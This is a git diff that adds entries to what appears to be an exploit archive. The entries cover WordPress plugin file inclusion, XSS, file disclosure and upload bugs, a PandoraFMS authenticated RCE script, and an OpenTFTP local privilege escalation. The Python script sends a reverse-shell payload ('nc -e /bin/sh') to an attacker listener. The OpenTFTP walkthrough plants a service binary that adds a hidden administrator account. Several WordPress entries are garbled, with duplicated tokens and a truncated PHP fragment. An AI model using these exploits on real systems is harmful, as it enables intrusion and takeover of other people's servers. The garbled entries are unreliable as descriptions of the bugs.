diff --git a/exploits/php/webapps/48058.txt b/exploits/php/webapps/48058.txt
new file mode 100644
index 0000000000..81f08de2db
--- /dev/null
+++ b/exploits/php/webapps/48058.txt
@@ -0,0 +1,39 @@
+# Tile: Wordpress Plugin tutor.1.5.3 - Local File Inclusion
+# Author: mehran feizi
+# Category: webapps
+# Date: 2020-02-12
+# vendor home page: https://wordpress.org/plugins/tutor/
+
+===================================================================
+Vulnerable page:
+/instructors.php
+===================================================================
+Vulnerable Source:
+3: $sub_page = tutor_utils ()->avalue_dot('sub_page', $_GET);
+5: $include_file = tutor ()->path . "views/pages/{$sub_page}.php";
+7: include include $include_file;
+requires:
+4: if(!empty($sub_page))
+6: if(file_exists($include_file))
+===================================================================
+Exploit:
+localhost/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=[LFI]
+=================================================================================
+contact me:
+telegram: @MF0584
+gmail: mehranfeizi13841384@gmail.com
+===================================================================
+Vulnerable page:
+/instructors.php
+===================================================================
+Vulnerable Source:
+3: $sub_page = tutor_utils ()->avalue_dot('sub_page', $_GET);
+5: $include_file = tutor ()->path . "views/pages/{$sub_page}.php";
+7: include include $include_file;
+requires:
+4: if(!empty($sub_page))
+6: if(file_exists($include_file))
+===================================================================
+Exploit:
+localhost/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=[LFI]
+=================================================================================
\ No newline at end of file
diff --git a/exploits/php/webapps/48059.txt b/exploits/php/webapps/48059.txt
new file mode 100644
index 0000000000..25198467ad
--- /dev/null
+++ b/exploits/php/webapps/48059.txt
@@ -0,0 +1,18 @@
+# Tile: Wordpress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting
+# Author: mehran feizi
+# Category: webapps
+# Date: 2020-02-12
+# vendor home page: https://wordpress.org/plugins/tutor/
+
+===================================================================
+Vulnerable page:
+/Quiz.php
+===================================================================
+Vulnerable Source:
+473: echo echo $topic_id;
+447: $topic_id = sanitize_text_field($_POST['topic_id']);
+===================================================================
+Exploit:
+localhost/wp-content/plugins/tutor/classes/Quiz.php
+$_POST('topic_id') =
+=================================================================================
\ No newline at end of file
diff --git a/exploits/php/webapps/48061.txt b/exploits/php/webapps/48061.txt
new file mode 100644
index 0000000000..257c72a7fc
--- /dev/null
+++ b/exploits/php/webapps/48061.txt
@@ -0,0 +1,14 @@
+# Tile: Wordpress Plugin wordfence.7.4.5 - Local File Disclosure
+# Author: mehran feizi
+# Category: webapps
+# Date: 2020-02-12
+# vendor home page: https://wordpress.org/plugins/wordfence/
+
+==============================================================================
+Vulnerable Source:
+5662: readfile readfile($localFile);
+5645: $localFile = ABSPATH . preg_replace('/^(?:\.\.|[\/]+)/', '', sanitize_text_field($_GET['file']));
+=================================================================================
+Exploit:
+localhost/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=[LFD]
+=================================================================================
\ No newline at end of file
diff --git a/exploits/php/webapps/48062.txt b/exploits/php/webapps/48062.txt
new file mode 100644
index 0000000000..a140679760
--- /dev/null
+++ b/exploits/php/webapps/48062.txt
@@ -0,0 +1,39 @@
+# Tile: Wordpress Plugin contact-form-7 5.1.6 - Remote File Upload
+# Author: mehran feizi
+# Category: webapps
+# Date: 2020-02-11
+# vendor home page: https://wordpress.org/plugins/contact-form-7/
+
+Vulnerable Source:
+134: move_uploaded_file move_uploaded_file($file['tmp_name'], $new_file))
+82: $file = $_FILES[$name] : null;
+132: $new_file = path_join($uploads_dir, $filename);
+122: $uploads_dir = wpcf7_maybe_add_random_dir($uploads_dir);
+121: $uploads_dir = wpcf7_upload_tmp_dir();
+131: $filename = wp_unique_filename($uploads_dir, $filename);
+122: $uploads_dir = wpcf7_maybe_add_random_dir($uploads_dir);
+121: $uploads_dir = wpcf7_upload_tmp_dir();
+128: $filename = apply_filters('wpcf7_upload_file_name', $filename, $file['name'], $tag);
+126: $filename = wpcf7_antiscript_file_name ($filename);
+125: $filename = wpcf7_canonicalize ($filename, 'as-is');
+124: $filename = $file['name'];
+82: $file = $_FILES[$name] : null;
+82: $file = $_FILES[$name] : null;
+78: ⇓ function wpcf7_file_validation_filter($result, $tag)
+
+
+Exploit:
+"@$shahab"));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$result = curl_exec($ch);
+curl_close($ch);
+print "$result";
+?>
+
+Location File:
+http://localhost/wordpress/wp-content/plugins/contact-form-7/file.jpg
\ No newline at end of file
diff --git a/exploits/php/webapps/48064.py b/exploits/php/webapps/48064.py
new file mode 100755
index 0000000000..24fff0d582
--- /dev/null
+++ b/exploits/php/webapps/48064.py
@@ -0,0 +1,77 @@
+# Exploit Title: PANDORAFMS 7.0 - Authenticated Remote Code Execution
+# Date: 2020-02-12
+# Exploit Author: Engin Demirbilek
+# Vendor homepage: http://pandorafms.org/
+# Version: 7.0
+# Software link: https://pandorafms.org/features/free-download-monitoring-software/
+# Tested on: CentOS
+# CVE: CVE-2020-8947
+
+#!/bin/python
+'''
+PANDORAFMS 7.0 Authenticated Remote Code Execution x4
+This exploits can be edited to exploit 4x Authenticated RCE vulnerabilities exist on PANDORAFMS.
+incase default vulnerable variable won't work, change the position of payload to one of the following ip_src, dst_port, src_port
+
+Author: Engin Demirbilek
+Github: github.com/EnginDemirbilek
+CVE: CVE-2020-8947
+
+'''
+import requests
+import sys
+
+if len(sys.argv) < 6:
+ print "Usage: ./exploit.py http://url username password listenerIP listenerPort"
+ exit()
+
+url = sys.argv[1]
+user = sys.argv[2]
+password = sys.argv[3]
+payload = '";nc -e /bin/sh ' + sys.argv[4] + ' ' + sys.argv[5] + ' ' + '#'
+
+login = {
+ 'nick':user,
+ 'pass':password,
+ 'login_button':'Login'
+}
+req = requests.Session()
+print "Sendin login request ..."
+login = req.post(url+"/pandora_console/index.php?login=1", data=login)
+
+payload = {
+ 'date':"",
+ 'time':"",
+ 'period':"",
+ 'interval_length':"",
+ 'chart_type':"",
+ 'max_aggregates':"1",
+ 'address_resolution':"0",
+ 'name':"",
+ 'assign_group':"0",
+ 'filter_type':"0",
+ 'filter_id':"0",
+ 'filter_selected':"0",
+ 'ip_dst':payload,
+ 'ip_src':"",
+ 'dst_port':"",
+ 'src_port':"",
+ 'advanced_filter':"",
+ 'aggregate':"dstip",
+ 'router_ip':"",
+ 'output':"bytes",
+ 'draw_button':"Draw"
+}
+
+print "[+] Sendin exploit ..."
+
+exploit = req.post(url+"/pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0",cookies=req.cookies, data=payload, headers={
+'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0',
+'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
+'Accept-Encoding':'gzip, deflate',
+'Content-Type':'application/x-www-form-urlencoded'})
+
+if exploit.status_code == 200:
+ print "[+] Everything seems ok, check your listener. If no connection established, change position of payload to ip_src, dst_port or src_port."
+else:
+ print "[-] Couldn't send the HTTP request, try again."
\ No newline at end of file
diff --git a/exploits/php/webapps/48065.txt b/exploits/php/webapps/48065.txt
new file mode 100644
index 0000000000..b16e2319f7
--- /dev/null
+++ b/exploits/php/webapps/48065.txt
@@ -0,0 +1,19 @@
+# Title : WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion
+# Author : mehran feizi
+# Vendor : https://wordpress.org/plugins/ultimate-member/
+# Category : Webapps
+# Date : 2020-02-11
+# Vendor home page: https://wordpress.org/plugins/ultimate-member/
+
+Vulnerable Page:
+/class-admin-upgrade.php
+
+
+Vulnerable Source:
+354: if(empty($_POST['pack'])) else
+356: include_once include_once $this->packages_dir . DIRECTORY_SEPARATOR . $_POST['pack'] . DIRECTORY_SEPARATOR . 'init.php';
+
+
+Exploit:
+localhost/wp-content/plugins/worprees plugin bug dar/ultimate-member/includes/admin/core/class-admin-upgrade.php
+$_POST('pack')=
\ No newline at end of file
diff --git a/exploits/windows/local/48060.txt b/exploits/windows/local/48060.txt
new file mode 100644
index 0000000000..2a65ef5fb6
--- /dev/null
+++ b/exploits/windows/local/48060.txt
@@ -0,0 +1,103 @@
+# Exploit Title: OpenTFTP 1.66 - Local Privilege Escalation
+# Exploit Author: boku
+# Date: 2020-02-12
+# Vendor Homepage: https://sourceforge.net/projects/tftp-server/
+# Software Link: https://sourceforge.net/projects/tftp-server/files/tftp%20server%20single%20port/OpenTFTPServerSPInstallerV1.66.exe/download
+# Version: 1.66
+# Tested On: Windows 10 (32-bit)
+
+# About:
+# "MultiThreaded TFTP Server Open Source Freeware Windows/Unix for PXEBOOT, firmware load, support tsize, blksize, timeout Server Port Ranges,
+# Block Number Rollover for Large Files. Runs as Service/daemon. Single Port version also available."
+# Downloads: 43,284 This Week - https://sourceforge.net/projects/tftp-server/
+
+# Vulnerability Details:
+# On Windows, Open TFTP Server v1.66, suffers from insecure file & folder permissions.
+# This allows a low-privilge, local attacker to escalate their permissions to Administrator;
+# by replacing the 'TFTPServer' service binary with a maliciously-crafted, binary executable.
+# The TFTP Server runs as an 'Auto_Start' Service, with 'LocalSystem' priviledges, after the
+# default installation. After the attacker has planted the malicious binary, the code will
+# be executed with System priviledges on the next boot of the windows device. See PoC below for details.
+
+## Service Information (there is also an Unquoted Service Path)
+C:\>sc qc TFTPServer
+SERVICE_NAME: TFTPServer
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 0 IGNORE
+ BINARY_PATH_NAME : C:\OpenTFTPServer\OpenTFTPServerSP.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : Open TFTP Single Port Server
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+## Insecure Folder Permission
+C:\OpenTFTPServer BUILTIN\Administrators:(OI)(CI)(ID)F
+ NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
+ BUILTIN\Users:(OI)(CI)(ID)R
+ NT AUTHORITY\Authenticated Users:(ID)C
+ NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C
+
+## Insecure File/Service Permission
+C:\OpenTFTPServer\OpenTFTPServerSP.exe BUILTIN\Administrators:(I)(F)
+ NT AUTHORITY\SYSTEM:(I)(F)
+ BUILTIN\Users:(I)(RX)
+ NT AUTHORITY\Authenticated Users:(I)(M)
+
+## Local Privilege Escalation Proof of Concept
+#0. Download & install Open TFTP Server v1.66
+
+#1. Create low privileged user & change to the user
+ C:\Users\lowPrivUser>net user lowprivuser | findstr /i "Membership Name" | findstr /v "Full"
+ User name lowPrivUser
+ Local Group Memberships *Users
+ Global Group memberships *None
+ C:\>whoami
+ mycomputer\lowprivuser
+
+#2. Move the Service EXE to a new name
+ C:\OpenTFTPServer>move OpenTFTPServerSP.exe ~OpenTFTPServerSP.exe
+ 1 file(s) moved.
+
+#3. Create malicious binary on kali linux
+ 1) Download dependencies
+ root@kali# apt install gcc-mingw-w64-i686 wine64 -y
+ 2) Add Admin User C Code
+ root@kali# cat addAdmin.c
+ #include
+ int main(void){
+ system("net user hacker mypassword /add");
+ system("net localgroup Administrators hacker /add");
+ WinExec("C:\\OpenTFTPServer\\~OpenTFTPServerSP.exe",0);
+ return 0;
+ }
+ 3) Compile Code
+ root@kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o OpenTFTPServerSP.exe
+
+#4. Transfer created 'OpenTFTPServerSP.exe' to the Windows Host
+
+#5. Move the created 'OpenTFTPServerSP.exe' binary to the 'C:\OpenTFTPServer\' Folder
+ C:\>move C:\Users\lowPrivUser\Desktop\OpenTFTPServerSP.exe C:\OpenTFTPServer\
+ 1 file(s) moved.
+ C:\>dir C:\OpenTFTPServer | findstr "OpenTFTPServerSP.exe"
+ 02/12/2020 05:59 PM 288,659 OpenTFTPServerSP.exe
+ 02/12/2020 06:38 PM 221,560 ~OpenTFTPServerSP.exe
+
+#6. Reboot the Computer
+
+#7. Look at that new Admin
+ C:\Users\lowPrivUser>net users hacker | findstr "Local name active"
+ User name hacker
+ Account active Yes
+ Local Group Memberships *Administrators *Users
+
+ C:\Users\lowPrivUser>net localgroup Administrators
+ Alias name Administrators
+ Comment Administrators have complete and unrestricted access to the computer/domain
+
+ Members
+ -------------------------------------------------------------------------------
+ Administrator
+ boku
+ hacker
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index afe60b3e85..41822305eb 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -10957,6 +10957,7 @@ id,file,description,date,author,type,platform,port
48055,exploits/windows/local/48055.py,"MyVideoConverter Pro 3.14 - 'Output Folder' Buffer Overflow",2020-02-12,ZwX,local,windows,
48056,exploits/windows/local/48056.py,"MyVideoConverter Pro 3.14 - 'TVSeries' Buffer Overflow",2020-02-12,ZwX,local,windows,
48057,exploits/windows/local/48057.txt,"HP System Event Utility - Local Privilege Escalation",2020-02-12,hyp3rlinx,local,windows,
+48060,exploits/windows/local/48060.txt,"OpenTFTP 1.66 - Local Privilege Escalation",2020-02-13,boku,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42351,3 +42352,9 @@ id,file,description,date,author,type,platform,port
48040,exploits/cgi/webapps/48040.txt,"CHIYU BF430 TCP IP Converter - Stored Cross-Site Scripting",2020-02-11,Luca.Chiou,webapps,cgi,
48042,exploits/php/webapps/48042.txt,"Vanilla Forums 2.6.3 - Persistent Cross-Site Scripting",2020-02-11,"Sayak Naskar",webapps,php,
48047,exploits/php/webapps/48047.rb,"WordPress InfiniteWP - Client Authentication Bypass (Metasploit)",2020-02-11,Metasploit,webapps,php,80
+48058,exploits/php/webapps/48058.txt,"Wordpress Plugin tutor.1.5.3 - Local File Inclusion",2020-02-13,"Mehran Feizi",webapps,php,
+48059,exploits/php/webapps/48059.txt,"Wordpress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting",2020-02-13,"Mehran Feizi",webapps,php,
+48061,exploits/php/webapps/48061.txt,"Wordpress Plugin wordfence.7.4.5 - Local File Disclosure",2020-02-13,"Mehran Feizi",webapps,php,
+48062,exploits/php/webapps/48062.txt,"Wordpress Plugin contact-form-7 5.1.6 - Remote File Upload",2020-02-13,"Mehran Feizi",webapps,php,
+48064,exploits/php/webapps/48064.py,"PANDORAFMS 7.0 - Authenticated Remote Code Execution",2020-02-13,"Engin Demirbilek",webapps,php,
+48065,exploits/php/webapps/48065.txt,"WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion",2020-02-13,"Mehran Feizi",webapps,php,